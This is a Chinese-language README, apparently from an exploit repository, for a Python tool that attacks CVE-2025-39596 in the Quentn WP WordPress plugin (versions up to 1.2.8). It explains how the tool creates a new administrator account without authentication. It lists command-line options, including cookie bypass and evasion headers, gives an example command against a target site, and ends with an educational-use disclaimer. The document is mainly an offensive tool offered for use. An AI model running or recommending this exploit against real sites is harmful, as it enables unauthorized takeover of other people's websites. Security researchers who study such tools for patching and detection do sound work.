Quentn WP <= 1.2.8 - 未认证的权限提升
WordPress 的 Quentn WP 插件在所有版本(包括 1.2.8)中均存在权限提升漏洞。这允许未经身份验证的攻击者将其权限提升至管理员级别。
CVE-2025-395969.8 (严重)此仓库包含一个针对 CVE-2025-39596 的 Python 利用程序,允许通过精心构造的 API 请求在无需认证的情况下创建新的 WordPress 管理员用户。
功能:
python3 CVE-2025-39596.py -u <target_url> -e <email> [options]
必需参数:
-u, --url 目标 WordPress 站点 URL(例如 http://127.0.0.1/wordpress)-e, --email 新管理员账户的电子邮件可选参数:
-f, --fname 名(默认:Pwn)-l, --lname 姓(默认:Admin)-r, --role 要分配的角色(默认:administrator)-k, --key Quentn API 密钥(如果已知)--cookie 用于已认证绕过的 Cookie(如果可用)--proxy 代理支持(例如 http://127.0.0.1:8080)--skip-ssl 跳过 SSL 验证--extra 启用额外的规避 Headers示例:
python3 CVE-2025-39596.py -u http://target.com/wordpress -e [email protected] --fname Root --lname User --proxy http://127.0.0.1:8080 --extra
Exploit Success By | Nxploited本工具仅用于教育和授权安全测试目的。
严禁任何滥用行为。
作者对因使用此代码造成的任何损害或滥用概不负责。
作者:Nxploited ( Khaled Alenazi )